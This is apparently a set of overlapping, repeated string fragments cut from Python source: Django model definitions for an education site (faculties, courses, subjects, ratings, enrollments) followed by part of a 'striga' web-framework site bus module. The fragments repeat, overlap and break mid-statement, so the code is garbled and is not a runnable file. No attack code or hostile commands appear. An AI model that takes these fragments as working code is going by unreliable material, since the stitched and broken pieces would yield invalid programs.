{self.rating}' class Enrollment(models.Model): subject = models.ForeignKey('Subject', models.DO_NOTHING, db_column='subject') student = models.ForeignKey('users.Student',", "'course' def __str__(self): return f'Course {self.id} | Name: {self.name}' class Category(models.Model): name =", "faculty_describtion = models.TextField(blank=True, null=True) class Meta: managed = False db_table = 'faculty' def", "null=True) thumb = models.CharField(max_length=100, blank=True, null=True) pic = models.CharField(max_length=200, blank=True, null=True) description =", "db_table = 'category' def __str__(self): return f'Category {self.name}' class Subject(models.Model): name = models.CharField(max_length=80,", "= models.TextField(blank=True, null=True) class Meta: managed = False db_table = 'faculty' def __str__(self):", "{self.id} | Name: {self.name}' class Category(models.Model): name = 
models.CharField(max_length=80, blank=True, null=True) parent =", "= models.CharField(max_length=80, blank=True, null=True) course_describtion = models.TextField(blank=True, null=True) faculty = models.ForeignKey('Faculty', models.DO_NOTHING, db_column='faculty',", "django.utils import timezone class Faculty(models.Model): name = models.CharField(max_length=80, blank=True, null=True) faculty_describtion = models.TextField(blank=True,", "= models.IntegerField(blank=True, null=True) class Meta: managed = False db_table = 'course' def __str__(self):", "models.CharField(max_length=80, blank=True, null=True) category = models.ForeignKey(Category, models.DO_NOTHING, db_column='category', blank=True, null=True) thumb = models.CharField(max_length=100,", "blank=True, null=True) description = models.CharField(max_length=1000, blank=True, null=True) class Meta: managed = False db_table", "{self.id} | Name: {self.name}' class SubjectRating(models.Model): subject = models.ForeignKey(Subject, models.DO_NOTHING, db_column='subject', blank=True, null=True)", "import MaxValueValidator from django.db import models from django.utils import timezone class Faculty(models.Model): name", "db_column='faculty', blank=True, null=True) category = models.IntegerField(blank=True, null=True) class Meta: managed = False db_table", "| Student {self.student.account.username} | Rating: {self.rating}' class Enrollment(models.Model): subject = models.ForeignKey('Subject', models.DO_NOTHING, db_column='subject')", "= models.CharField(max_length=200, blank=True, null=True) description = models.CharField(max_length=1000, blank=True, null=True) class Meta: managed =", "null=True) course_describtion = models.TextField(blank=True, null=True) faculty = models.ForeignKey('Faculty', models.DO_NOTHING, db_column='faculty', blank=True, null=True) category", "category = models.IntegerField(blank=True, null=True) class Meta: managed = False db_table = 'course' def", "def __str__(self): return f'Category 
{self.name}' class Subject(models.Model): name = models.CharField(max_length=80, blank=True, null=True) category", "django.core.validators import MaxValueValidator from django.db import models from django.utils import timezone class Faculty(models.Model):", "null=True) student = models.ForeignKey('users.Student', models.DO_NOTHING, db_column='student', blank=True, null=True) rating = models.IntegerField(blank=True, null=True) commence", "Meta: managed = False db_table = 'faculty' def __str__(self): return f'Faculty {self.name}' class", "null=True) class Meta: managed = False db_table = 'subject_rating' def __str__(self): return f'Subject:", "= models.ForeignKey('users.Student', models.DO_NOTHING, db_column='student') status = models.IntegerField(blank=True, null=True) # lesson = models.ForeignKey('Lesson', models.DO_NOTHING,", "null=True) category = models.IntegerField(blank=True, null=True) class Meta: managed = False db_table = 'course'", "Meta: managed = False db_table = 'course' def __str__(self): return f'Course {self.id} |", "return f'Subject: {self.subject.name} | Student {self.student.account.username} | Rating: {self.rating}' class Enrollment(models.Model): subject =", "managed = False db_table = 'subject' def __str__(self): return f'Subject {self.id} | Name:", "null=True) timestamp = models.DateTimeField(blank=True, null=True) class Meta: managed = False db_table = 'subject_rating'", "def __str__(self): return f'Subject: {self.subject.name} | Student {self.student.account.username} | Rating: {self.rating}' class Enrollment(models.Model):", "pic = models.CharField(max_length=200, blank=True, null=True) description = models.CharField(max_length=1000, blank=True, null=True) class Meta: managed", "rating = models.IntegerField(blank=True, null=True) commence = models.TextField(blank=True, null=True) timestamp = models.DateTimeField(blank=True, null=True) class", "models.ForeignKey('users.Student', models.DO_NOTHING, db_column='student') status = 
models.IntegerField(blank=True, null=True) # lesson = models.ForeignKey('Lesson', models.DO_NOTHING, db_column='lesson',", "'faculty' def __str__(self): return f'Faculty {self.name}' class Course(models.Model): # id = models.IntegerField(primary_key=True) name", "models.CharField(max_length=1000, blank=True, null=True) class Meta: managed = False db_table = 'subject' def __str__(self):", "student = models.ForeignKey('users.Student', models.DO_NOTHING, db_column='student') status = models.IntegerField(blank=True, null=True) # lesson = models.ForeignKey('Lesson',", "import models from django.utils import timezone class Faculty(models.Model): name = models.CharField(max_length=80, blank=True, null=True)", "from django.core.validators import MaxValueValidator from django.core.validators import MaxValueValidator from django.db import models from", "category = models.ForeignKey(Category, models.DO_NOTHING, db_column='category', blank=True, null=True) thumb = models.CharField(max_length=100, blank=True, null=True) pic", "course_describtion = models.TextField(blank=True, null=True) faculty = models.ForeignKey('Faculty', models.DO_NOTHING, db_column='faculty', blank=True, null=True) category =", "django.core.validators import MaxValueValidator from django.core.validators import MaxValueValidator from django.db import models from django.utils", "managed = False db_table = 'category' def __str__(self): return f'Category {self.name}' class Subject(models.Model):", "name = models.CharField(max_length=80, blank=True, null=True) course_describtion = models.TextField(blank=True, null=True) faculty = models.ForeignKey('Faculty', models.DO_NOTHING,", "f'Subject {self.id} | Name: {self.name}' class SubjectRating(models.Model): subject = models.ForeignKey(Subject, models.DO_NOTHING, db_column='subject', blank=True,", "models.TextField(blank=True, null=True) class Meta: managed = False db_table = 'faculty' def __str__(self): return", "models.IntegerField(blank=True, null=True) class 
Meta: managed = False db_table = 'course' def __str__(self): return", "db_column='subject', blank=True, null=True) student = models.ForeignKey('users.Student', models.DO_NOTHING, db_column='student', blank=True, null=True) rating = models.IntegerField(blank=True,", "= 'category' def __str__(self): return f'Category {self.name}' class Subject(models.Model): name = models.CharField(max_length=80, blank=True,", "blank=True, null=True) faculty_describtion = models.TextField(blank=True, null=True) class Meta: managed = False db_table =", "= models.ForeignKey(Category, models.DO_NOTHING, db_column='category', blank=True, null=True) thumb = models.CharField(max_length=100, blank=True, null=True) pic =", "managed = False db_table = 'course' def __str__(self): return f'Course {self.id} | Name:", "# id = models.IntegerField(primary_key=True) name = models.CharField(max_length=80, blank=True, null=True) course_describtion = models.TextField(blank=True, null=True)", "name = models.CharField(max_length=80, blank=True, null=True) category = models.ForeignKey(Category, models.DO_NOTHING, db_column='category', blank=True, null=True) thumb", "models.CharField(max_length=100, blank=True, null=True) pic = models.CharField(max_length=200, blank=True, null=True) description = models.CharField(max_length=1000, blank=True, null=True)", "class Enrollment(models.Model): subject = models.ForeignKey('Subject', models.DO_NOTHING, db_column='subject') student = models.ForeignKey('users.Student', models.DO_NOTHING, db_column='student') status", "class Meta: managed = False db_table = 'enrollment' def __str__(self): return f'Student {self.student.account.username}", "null=True) rating = models.IntegerField(blank=True, null=True) commence = models.TextField(blank=True, null=True) timestamp = models.DateTimeField(blank=True, null=True)", "models.IntegerField(blank=True, null=True) # lesson = models.ForeignKey('Lesson', models.DO_NOTHING, db_column='lesson', blank=True, null=True) class Meta: 
managed", "Student {self.student.account.username} | Rating: {self.rating}' class Enrollment(models.Model): subject = models.ForeignKey('Subject', models.DO_NOTHING, db_column='subject') student", "= models.ForeignKey('Subject', models.DO_NOTHING, db_column='subject') student = models.ForeignKey('users.Student', models.DO_NOTHING, db_column='student') status = models.IntegerField(blank=True, null=True)", "blank=True, null=True) class Meta: managed = False db_table = 'enrollment' def __str__(self): return", "blank=True, null=True) pic = models.CharField(max_length=200, blank=True, null=True) description = models.CharField(max_length=1000, blank=True, null=True) class", "null=True) parent = models.ForeignKey('self', models.DO_NOTHING, db_column='parent', blank=True, null=True) class Meta: managed = False", "__str__(self): return f'Subject: {self.subject.name} | Student {self.student.account.username} | Rating: {self.rating}' class Enrollment(models.Model): subject", "models.ForeignKey('Subject', models.DO_NOTHING, db_column='subject') student = models.ForeignKey('users.Student', models.DO_NOTHING, db_column='student') status = models.IntegerField(blank=True, null=True) #", "= 'faculty' def __str__(self): return f'Faculty {self.name}' class Course(models.Model): # id = models.IntegerField(primary_key=True)", "models.ForeignKey('users.Student', models.DO_NOTHING, db_column='student', blank=True, null=True) rating = models.IntegerField(blank=True, null=True) commence = models.TextField(blank=True, null=True)", "= 'subject_rating' def __str__(self): return f'Subject: {self.subject.name} | Student {self.student.account.username} | Rating: {self.rating}'", "null=True) class Meta: managed = False db_table = 'enrollment' def __str__(self): return f'Student", "from django.utils import timezone class Faculty(models.Model): name = models.CharField(max_length=80, blank=True, null=True) faculty_describtion =", "def __str__(self): return f'Faculty {self.name}' class 
Course(models.Model): # id = models.IntegerField(primary_key=True) name =", "Meta: managed = False db_table = 'subject' def __str__(self): return f'Subject {self.id} |", "Rating: {self.rating}' class Enrollment(models.Model): subject = models.ForeignKey('Subject', models.DO_NOTHING, db_column='subject') student = models.ForeignKey('users.Student', models.DO_NOTHING,", "models.DO_NOTHING, db_column='student') status = models.IntegerField(blank=True, null=True) # lesson = models.ForeignKey('Lesson', models.DO_NOTHING, db_column='lesson', blank=True,", "False db_table = 'faculty' def __str__(self): return f'Faculty {self.name}' class Course(models.Model): # id", "blank=True, null=True) student = models.ForeignKey('users.Student', models.DO_NOTHING, db_column='student', blank=True, null=True) rating = models.IntegerField(blank=True, null=True)", "models.DO_NOTHING, db_column='category', blank=True, null=True) thumb = models.CharField(max_length=100, blank=True, null=True) pic = models.CharField(max_length=200, blank=True,", "{self.student.account.username} | Rating: {self.rating}' class Enrollment(models.Model): subject = models.ForeignKey('Subject', models.DO_NOTHING, db_column='subject') student =", "f'Subject: {self.subject.name} | Student {self.student.account.username} | Rating: {self.rating}' class Enrollment(models.Model): subject = models.ForeignKey('Subject',", "null=True) commence = models.TextField(blank=True, null=True) timestamp = models.DateTimeField(blank=True, null=True) class Meta: managed =", "Enrollment(models.Model): subject = models.ForeignKey('Subject', models.DO_NOTHING, db_column='subject') student = models.ForeignKey('users.Student', models.DO_NOTHING, db_column='student') status =", "f'Category {self.name}' class Subject(models.Model): name = models.CharField(max_length=80, blank=True, null=True) category = models.ForeignKey(Category, models.DO_NOTHING,", "SubjectRating(models.Model): subject = models.ForeignKey(Subject, models.DO_NOTHING, 
db_column='subject', blank=True, null=True) student = models.ForeignKey('users.Student', models.DO_NOTHING, db_column='student',", "MaxValueValidator from django.db import models from django.utils import timezone class Faculty(models.Model): name =", "return f'Course {self.id} | Name: {self.name}' class Category(models.Model): name = models.CharField(max_length=80, blank=True, null=True)", "= models.CharField(max_length=80, blank=True, null=True) parent = models.ForeignKey('self', models.DO_NOTHING, db_column='parent', blank=True, null=True) class Meta:", "null=True) class Meta: managed = False db_table = 'category' def __str__(self): return f'Category", "False db_table = 'category' def __str__(self): return f'Category {self.name}' class Subject(models.Model): name =", "Subject(models.Model): name = models.CharField(max_length=80, blank=True, null=True) category = models.ForeignKey(Category, models.DO_NOTHING, db_column='category', blank=True, null=True)", "student = models.ForeignKey('users.Student', models.DO_NOTHING, db_column='student', blank=True, null=True) rating = models.IntegerField(blank=True, null=True) commence =", "parent = models.ForeignKey('self', models.DO_NOTHING, db_column='parent', blank=True, null=True) class Meta: managed = False db_table", "managed = False db_table = 'subject_rating' def __str__(self): return f'Subject: {self.subject.name} | Student", "import timezone class Faculty(models.Model): name = models.CharField(max_length=80, blank=True, null=True) faculty_describtion = models.TextField(blank=True, null=True)", "models.DO_NOTHING, db_column='parent', blank=True, null=True) class Meta: managed = False db_table = 'category' def", "models.CharField(max_length=200, blank=True, null=True) description = models.CharField(max_length=1000, blank=True, null=True) class Meta: managed = False", "class SubjectRating(models.Model): subject = models.ForeignKey(Subject, models.DO_NOTHING, db_column='subject', blank=True, null=True) student = 
models.ForeignKey('users.Student', models.DO_NOTHING,", "'subject_rating' def __str__(self): return f'Subject: {self.subject.name} | Student {self.student.account.username} | Rating: {self.rating}' class", "db_table = 'course' def __str__(self): return f'Course {self.id} | Name: {self.name}' class Category(models.Model):", "models.TextField(blank=True, null=True) faculty = models.ForeignKey('Faculty', models.DO_NOTHING, db_column='faculty', blank=True, null=True) category = models.IntegerField(blank=True, null=True)", "= models.ForeignKey(Subject, models.DO_NOTHING, db_column='subject', blank=True, null=True) student = models.ForeignKey('users.Student', models.DO_NOTHING, db_column='student', blank=True, null=True)", "False db_table = 'course' def __str__(self): return f'Course {self.id} | Name: {self.name}' class", "timestamp = models.DateTimeField(blank=True, null=True) class Meta: managed = False db_table = 'subject_rating' def", "db_table = 'faculty' def __str__(self): return f'Faculty {self.name}' class Course(models.Model): # id =", "Faculty(models.Model): name = models.CharField(max_length=80, blank=True, null=True) faculty_describtion = models.TextField(blank=True, null=True) class Meta: managed", "= 'course' def __str__(self): return f'Course {self.id} | Name: {self.name}' class Category(models.Model): name", "= False db_table = 'faculty' def __str__(self): return f'Faculty {self.name}' class Course(models.Model): #", "__str__(self): return f'Course {self.id} | Name: {self.name}' class Category(models.Model): name = models.CharField(max_length=80, blank=True,", "name = models.CharField(max_length=80, blank=True, null=True) parent = models.ForeignKey('self', models.DO_NOTHING, db_column='parent', blank=True, null=True) class", "= models.TextField(blank=True, null=True) faculty = models.ForeignKey('Faculty', models.DO_NOTHING, db_column='faculty', blank=True, null=True) category = models.IntegerField(blank=True,", "import MaxValueValidator from 
django.core.validators import MaxValueValidator from django.db import models from django.utils import", "class Meta: managed = False db_table = 'category' def __str__(self): return f'Category {self.name}'", "null=True) category = models.ForeignKey(Category, models.DO_NOTHING, db_column='category', blank=True, null=True) thumb = models.CharField(max_length=100, blank=True, null=True)", "description = models.CharField(max_length=1000, blank=True, null=True) class Meta: managed = False db_table = 'subject'", "{self.name}' class SubjectRating(models.Model): subject = models.ForeignKey(Subject, models.DO_NOTHING, db_column='subject', blank=True, null=True) student = models.ForeignKey('users.Student',", "models.DO_NOTHING, db_column='subject', blank=True, null=True) student = models.ForeignKey('users.Student', models.DO_NOTHING, db_column='student', blank=True, null=True) rating =", "= models.ForeignKey('Lesson', models.DO_NOTHING, db_column='lesson', blank=True, null=True) class Meta: managed = False db_table =", "null=True) faculty_describtion = models.TextField(blank=True, null=True) class Meta: managed = False db_table = 'faculty'", "db_column='parent', blank=True, null=True) class Meta: managed = False db_table = 'category' def __str__(self):", "null=True) # lesson = models.ForeignKey('Lesson', models.DO_NOTHING, db_column='lesson', blank=True, null=True) class Meta: managed =", "# lesson = models.ForeignKey('Lesson', models.DO_NOTHING, db_column='lesson', blank=True, null=True) class Meta: managed = False", "managed = False db_table = 'enrollment' def __str__(self): return f'Student {self.student.account.username} | Subject:", "thumb = models.CharField(max_length=100, blank=True, null=True) pic = models.CharField(max_length=200, blank=True, null=True) description = models.CharField(max_length=1000,", "models.CharField(max_length=80, blank=True, null=True) parent = models.ForeignKey('self', models.DO_NOTHING, db_column='parent', blank=True, null=True) class Meta: 
managed", "blank=True, null=True) parent = models.ForeignKey('self', models.DO_NOTHING, db_column='parent', blank=True, null=True) class Meta: managed =", "def __str__(self): return f'Subject {self.id} | Name: {self.name}' class SubjectRating(models.Model): subject = models.ForeignKey(Subject,", "MaxValueValidator from django.core.validators import MaxValueValidator from django.db import models from django.utils import timezone", "= models.IntegerField(blank=True, null=True) commence = models.TextField(blank=True, null=True) timestamp = models.DateTimeField(blank=True, null=True) class Meta:", "Meta: managed = False db_table = 'subject_rating' def __str__(self): return f'Subject: {self.subject.name} |", "= models.IntegerField(blank=True, null=True) # lesson = models.ForeignKey('Lesson', models.DO_NOTHING, db_column='lesson', blank=True, null=True) class Meta:", "return f'Faculty {self.name}' class Course(models.Model): # id = models.IntegerField(primary_key=True) name = models.CharField(max_length=80, blank=True,", "commence = models.TextField(blank=True, null=True) timestamp = models.DateTimeField(blank=True, null=True) class Meta: managed = False", "db_table = 'subject' def __str__(self): return f'Subject {self.id} | Name: {self.name}' class SubjectRating(models.Model):", "= models.CharField(max_length=1000, blank=True, null=True) class Meta: managed = False db_table = 'subject' def", "subject = models.ForeignKey(Subject, models.DO_NOTHING, db_column='subject', blank=True, null=True) student = models.ForeignKey('users.Student', models.DO_NOTHING, db_column='student', blank=True,", "null=True) class Meta: managed = False db_table = 'faculty' def __str__(self): return f'Faculty", "from django.core.validators import MaxValueValidator from django.db import models from django.utils import timezone class", "models.IntegerField(blank=True, null=True) commence = models.TextField(blank=True, null=True) timestamp = models.DateTimeField(blank=True, null=True) class Meta: 
managed", "class Meta: managed = False db_table = 'subject_rating' def __str__(self): return f'Subject: {self.subject.name}", "False db_table = 'subject' def __str__(self): return f'Subject {self.id} | Name: {self.name}' class", "Meta: managed = False db_table = 'enrollment' def __str__(self): return f'Student {self.student.account.username} |", "def __str__(self): return f'Course {self.id} | Name: {self.name}' class Category(models.Model): name = models.CharField(max_length=80,", "Meta: managed = False db_table = 'category' def __str__(self): return f'Category {self.name}' class", "blank=True, null=True) class Meta: managed = False db_table = 'category' def __str__(self): return", "class Meta: managed = False db_table = 'faculty' def __str__(self): return f'Faculty {self.name}'", "models from django.utils import timezone class Faculty(models.Model): name = models.CharField(max_length=80, blank=True, null=True) faculty_describtion", "blank=True, null=True) course_describtion = models.TextField(blank=True, null=True) faculty = models.ForeignKey('Faculty', models.DO_NOTHING, db_column='faculty', blank=True, null=True)", "name = models.CharField(max_length=80, blank=True, null=True) faculty_describtion = models.TextField(blank=True, null=True) class Meta: managed =", "= False db_table = 'category' def __str__(self): return f'Category {self.name}' class Subject(models.Model): name", "= False db_table = 'subject' def __str__(self): return f'Subject {self.id} | Name: {self.name}'", "managed = False db_table = 'faculty' def __str__(self): return f'Faculty {self.name}' class Course(models.Model):", "f'Course {self.id} | Name: {self.name}' class Category(models.Model): name = models.CharField(max_length=80, blank=True, null=True) parent", "models.DO_NOTHING, db_column='student', blank=True, null=True) rating = models.IntegerField(blank=True, null=True) commence = models.TextField(blank=True, null=True) timestamp", "models.CharField(max_length=80, blank=True, null=True) 
course_describtion = models.TextField(blank=True, null=True) faculty = models.ForeignKey('Faculty', models.DO_NOTHING, db_column='faculty', blank=True,", "= models.TextField(blank=True, null=True) timestamp = models.DateTimeField(blank=True, null=True) class Meta: managed = False db_table", "db_table = 'subject_rating' def __str__(self): return f'Subject: {self.subject.name} | Student {self.student.account.username} | Rating:", "blank=True, null=True) category = models.IntegerField(blank=True, null=True) class Meta: managed = False db_table =", "models.ForeignKey('self', models.DO_NOTHING, db_column='parent', blank=True, null=True) class Meta: managed = False db_table = 'category'", "models.DO_NOTHING, db_column='lesson', blank=True, null=True) class Meta: managed = False db_table = 'enrollment' def", "= False db_table = 'subject_rating' def __str__(self): return f'Subject: {self.subject.name} | Student {self.student.account.username}", "db_column='student') status = models.IntegerField(blank=True, null=True) # lesson = models.ForeignKey('Lesson', models.DO_NOTHING, db_column='lesson', blank=True, null=True)", "from django.db import models from django.utils import timezone class Faculty(models.Model): name = models.CharField(max_length=80,", "models.TextField(blank=True, null=True) timestamp = models.DateTimeField(blank=True, null=True) class Meta: managed = False db_table =", "class Faculty(models.Model): name = models.CharField(max_length=80, blank=True, null=True) faculty_describtion = models.TextField(blank=True, null=True) class Meta:", "__str__(self): return f'Subject {self.id} | Name: {self.name}' class SubjectRating(models.Model): subject = models.ForeignKey(Subject, models.DO_NOTHING,", "models.ForeignKey(Subject, models.DO_NOTHING, db_column='subject', blank=True, null=True) student = models.ForeignKey('users.Student', models.DO_NOTHING, db_column='student', blank=True, null=True) rating", "timezone class Faculty(models.Model): name = 
models.CharField(max_length=80, blank=True, null=True) faculty_describtion = models.TextField(blank=True, null=True) class", "class Category(models.Model): name = models.CharField(max_length=80, blank=True, null=True) parent = models.ForeignKey('self', models.DO_NOTHING, db_column='parent', blank=True,", "blank=True, null=True) class Meta: managed = False db_table = 'subject' def __str__(self): return", "null=True) faculty = models.ForeignKey('Faculty', models.DO_NOTHING, db_column='faculty', blank=True, null=True) category = models.IntegerField(blank=True, null=True) class", "faculty = models.ForeignKey('Faculty', models.DO_NOTHING, db_column='faculty', blank=True, null=True) category = models.IntegerField(blank=True, null=True) class Meta:", "= models.CharField(max_length=80, blank=True, null=True) category = models.ForeignKey(Category, models.DO_NOTHING, db_column='category', blank=True, null=True) thumb =", "subject = models.ForeignKey('Subject', models.DO_NOTHING, db_column='subject') student = models.ForeignKey('users.Student', models.DO_NOTHING, db_column='student') status = models.IntegerField(blank=True,", "models.DO_NOTHING, db_column='faculty', blank=True, null=True) category = models.IntegerField(blank=True, null=True) class Meta: managed = False", "db_column='student', blank=True, null=True) rating = models.IntegerField(blank=True, null=True) commence = models.TextField(blank=True, null=True) timestamp =", "= models.CharField(max_length=80, blank=True, null=True) faculty_describtion = models.TextField(blank=True, null=True) class Meta: managed = False", "= False db_table = 'course' def __str__(self): return f'Course {self.id} | Name: {self.name}'", "Name: {self.name}' class Category(models.Model): name = models.CharField(max_length=80, blank=True, null=True) parent = models.ForeignKey('self', models.DO_NOTHING,", "Course(models.Model): # id = models.IntegerField(primary_key=True) name = models.CharField(max_length=80, blank=True, null=True) 
course_describtion = models.TextField(blank=True,", "blank=True, null=True) rating = models.IntegerField(blank=True, null=True) commence = models.TextField(blank=True, null=True) timestamp = models.DateTimeField(blank=True,", "models.CharField(max_length=80, blank=True, null=True) faculty_describtion = models.TextField(blank=True, null=True) class Meta: managed = False db_table", "id = models.IntegerField(primary_key=True) name = models.CharField(max_length=80, blank=True, null=True) course_describtion = models.TextField(blank=True, null=True) faculty", "models.IntegerField(primary_key=True) name = models.CharField(max_length=80, blank=True, null=True) course_describtion = models.TextField(blank=True, null=True) faculty = models.ForeignKey('Faculty',", "null=True) class Meta: managed = False db_table = 'subject' def __str__(self): return f'Subject" ]
[ "len(path) == 0: raise striga.core.exception.StrigaBusError('NotFound') val = path.pop(0) if val == '': val", "{} PathCheckRE = re.compile(r'^[^//]*$') def __init__(self): self.IntroBusItems = [] #Iterate thru this (call", "self.ErrorBus.BusStop() if (self.DefaultBusItem is not None) and hasattr(self.DefaultBusItem, 'BusStop'): self.DefaultBusItem.BusStop() for bm in", "overwriting\") from ._stsvcsb_errorbus import ErrorBus self.ErrorBus = ErrorBus() rootdir = os.path.join(self.RootDir, rootdir) return", "path against this, if ok, call item from that self.DefaultBusItem = None #Call", "rootdir, source, controllerclass, pathlimit)) return nbi._configure(conffilename = conffilename) def _configure_finished(self): pass def __call__(self,", "'BusStart'): bm.BusStart() if (self.DefaultBusItem is not None) and hasattr(self.DefaultBusItem, 'BusStart'): self.DefaultBusItem.BusStart() if self.ErrorBus", "= os.path.join(self.RootDir, rootdir) nbi = self._InsertBusItem(path, functools.partial(Controller, rootdir, source, controllerclass, pathlimit)) return nbi._configure(conffilename", "CustomSiteBusDefs = {} PathCheckRE = re.compile(r'^[^//]*$') def __init__(self): self.IntroBusItems = [] #Iterate thru", "striga.core.exception.StrigaBusError('NotFound') else: ctx.req.Vars.SITEBUS['LastPath'] = path.pop(0) bm(ctx, path) except striga.core.exception._StrigaClientRedirectBase: # Redirections are not", "Entry point to this bus object ''' SiteBusVar = ctx.req.Vars.SITEBUS SiteBusVar['RootDir'] = self.RootDir", "PathCheckRE = re.compile(r'^[^//]*$') def __init__(self): self.IntroBusItems = [] #Iterate thru this (call each)", "= '==0', rootdir = '.'): ''' Config keyword - Controller ''' from ._stsvcsb_cntrlr", "self.DefaultBusItem = createitemfnct() return self.DefaultBusItem if self.PathCheckRE.match(path) is None: raise striga.core.exception.StrigaConfigurationError(\"Invalid path '%s'", "functools.partial(ComponentBusRef, component, busname)) def __configure_exec(self, 
conffilename, source, entry, path = None, pathlimit =", "class Bus(object): CustomSiteBusDefs = {} PathCheckRE = re.compile(r'^[^//]*$') def __init__(self): self.IntroBusItems = []", "0: raise striga.core.exception.StrigaBusError('NotFound') val = path.pop(0) if val == '': val = default", "'!' : self._configure_finished, }) return defs def __configure_location(self, conffilename, path = None, index", "= '.'): ''' @param path - can be None as location can be", "try: self.ErrorBus(ctx, epath) return False except: L.exception(\"Exception during error bus processing:\") raise prev_excvalue", "os.path.isdir(self.RootDir): if os.path.exists(self.RootDir): L.warning(\"Bus item root directory is not directory: '%s'\" % (self.RootDir))", "change path array if len(path) == 0: if self.Index is not None: path.append(self.Index)", "ok, call item from that self.DefaultBusItem = None #Call when not found anything", "def BusStop(self): if self.ErrorBus is not None: self.ErrorBus.BusStop() if (self.DefaultBusItem is not None)", "nbi return nbi def _configure(self, conffilename, index = None, rootdir = None): if", "return nbi def _configure(self, conffilename, index = None, rootdir = None): if rootdir", "processing:\") raise prev_excvalue else: raise def BusStart(self): for bm in self.IntroBusItems: if hasattr(bm,", "self.PathCheckRE.match(path) is None: raise striga.core.exception.StrigaConfigurationError(\"Invalid path '%s' given!\" % path) if self.CrossroadBusItems.has_key(path): raise", "None, pathlimit = '==0', rootdir = '.'): ''' Config keyword - exec '''", "None def _InsertBusItem(self, path, createitemfnct): if path is None: if self.DefaultBusItem is not", "sitebus item too ''' from ._stsvcsb_location import Location l = self._InsertBusItem(path, Location) rootdir", "source, controllerclass, pathlimit)) return nbi._configure(conffilename = conffilename) def _configure_finished(self): pass def __call__(self, ctx,", "not None: raise 
striga.core.exception.StrigaConfigurationError(\"Default bus item is already configured!\") self.DefaultBusItem = createitemfnct() return", "0: if self.Index is not None: path.append(self.Index) else: raise striga.core.exception.StrigaBusError(\"NotFound\") #Then find item", "= None, rootdir = '.'): ''' @param path - can be None as", "= self try: #First iterate thru IntroBusItems for ibm in self.IntroBusItems: ibm(ctx, path)", "None, rootdir = '.'): ''' @param path - can be None as location", "'Controller', path = None, pathlimit = '==0', rootdir = '.'): ''' Config keyword", "self.__configure_errorbus, 'var' : self.__configure_var, 'serve' : self.__configure_serve, 'view' : self.__configure_view, 'exec' : self.__configure_exec,", "use StrigaBusError exceptions)\") epath = str(ctx.err.exctype) try: self.ErrorBus(ctx, epath) return False except: L.exception(\"Exception", "= self._InsertBusItem(path, functools.partial(Controller, rootdir, source, controllerclass, pathlimit)) return nbi._configure(conffilename = conffilename) def _configure_finished(self):", "if self.Index is not None: path.append(self.Index) else: raise striga.core.exception.StrigaBusError(\"NotFound\") #Then find item in", "None: self.ErrorBus.BusStart() def BusStop(self): if self.ErrorBus is not None: self.ErrorBus.BusStop() if (self.DefaultBusItem is", "createitemfnct() self.CrossroadBusItems[path] = nbi return nbi def _configure(self, conffilename, index = None, rootdir", "Config keyword - serve ''' from ._stsvcsb_serve import Serve self._InsertBusItem(path, functools.partial(Serve, self.RootDir, pattern,", "bus processing (you should use StrigaBusError exceptions)\") epath = str(ctx.err.exctype) try: self.ErrorBus(ctx, epath)", "'BusStop'): bm.BusStop() ### def BusVar(name, default, ctx, path): if len(path) == 0: raise", "None: rootdir = os.path.dirname(conffilename) self.RootDir = os.path.normpath(os.path.abspath(rootdir)) if not os.path.isdir(self.RootDir): if os.path.exists(self.RootDir): 
L.warning(\"Bus", "L.warning(\"Bus item root directory doesn't exist: '%s'\" % (self.RootDir)) self.Index = index defs", "L.warning(\"Site bus path not found: {0}\".format(path)) raise striga.core.exception.StrigaBusError('NotFound') else: ctx.req.Vars.SITEBUS['LastPath'] = path.pop(0) bm(ctx,", "ibm(ctx, path) #Check again as IntroBusItems can change path array if len(path) ==", "BusStart(self): for bm in self.IntroBusItems: if hasattr(bm, 'BusStart'): bm.BusStart() for bm in self.CrossroadBusItems.itervalues():", "self.DefaultBusItem.BusStop() for bm in self.CrossroadBusItems.itervalues(): if hasattr(bm, 'BusStop'): bm.BusStop() for bm in self.IntroBusItems:", "'%s'\" % (self.RootDir)) else: L.warning(\"Bus item root directory doesn't exist: '%s'\" % (self.RootDir))", "__configure_var(self, conffilename, name, default = 0): self.IntroBusItems.append(functools.partial(BusVar, name, default)) def __configure_serve(self, conffilename, pattern,", "try: #First iterate thru IntroBusItems for ibm in self.IntroBusItems: ibm(ctx, path) #Check again", "''' Config keyword - view ''' from ._stsvcsb_view import View self._InsertBusItem(path, functools.partial(View, self.RootDir,", "def __configure_serve(self, conffilename, pattern, path = None, buffersize = 64*1024): ''' Config keyword", "L.warning(\"Bus item root directory is not directory: '%s'\" % (self.RootDir)) else: L.warning(\"Bus item", "thru ErrorBus raise except: ctx.err.exctype, ctx.err.excvalue = sys.exc_info()[:2] prev_excvalue = copy.copy(ctx.err.excvalue) if self.ErrorBus", "= rootdir) def __configure_errorbus(self, conffilename, rootdir = '.'): if self.ErrorBus is not None:", "mode, path = None, entry='main', pathlimit='==0'): ''' Config keyword - view ''' from", "functools.partial(Serve, self.RootDir, pattern, buffersize)) def __configure_view(self, conffilename, source, mode, path = None, entry='main',", "busname)) def __configure_exec(self, conffilename, source, entry, path = None, pathlimit = '==0', 
rootdir", "self.IntroBusItems = [] #Iterate thru this (call each) in the begining self.CrossroadBusItems =", "this (call each) in the begining self.CrossroadBusItems = {} #Check path against this,", "rootdir) def __configure_errorbus(self, conffilename, rootdir = '.'): if self.ErrorBus is not None: L.warning(\"Bus", "is None: raise striga.core.exception.StrigaConfigurationError(\"Invalid path '%s' given!\" % path) if self.CrossroadBusItems.has_key(path): raise striga.core.exception.StrigaConfigurationError(\"Bus", "from ._stsvcsb_errorbus import ErrorBus self.ErrorBus = ErrorBus() rootdir = os.path.join(self.RootDir, rootdir) return self.ErrorBus._configure(conffilename", "as location can be default sitebus item too ''' from ._stsvcsb_location import Location", "<gh_stars>0 import os, sys, re, functools, copy, logging as L import striga.core.exception ###", "if self.CrossroadBusItems.has_key(path): raise striga.core.exception.StrigaConfigurationError(\"Bus item for '%s' is already configured!\" % path) nbi", "raise striga.core.exception.StrigaConfigurationError(\"Bus item for '%s' is already configured!\" % path) nbi = createitemfnct()", ": self.__configure_errorbus, 'var' : self.__configure_var, 'serve' : self.__configure_serve, 'view' : self.__configure_view, 'exec' :", "self.__configure_var, 'serve' : self.__configure_serve, 'view' : self.__configure_view, 'exec' : self.__configure_exec, 'controller' : self.__configure_controller,", "entry, pathlimit)) def __configure_controller(self, conffilename, source, controllerclass = 'Controller', path = None, pathlimit", "= [] #Iterate thru this (call each) in the begining self.CrossroadBusItems = {}", "import Location l = self._InsertBusItem(path, Location) rootdir = os.path.join(self.RootDir, 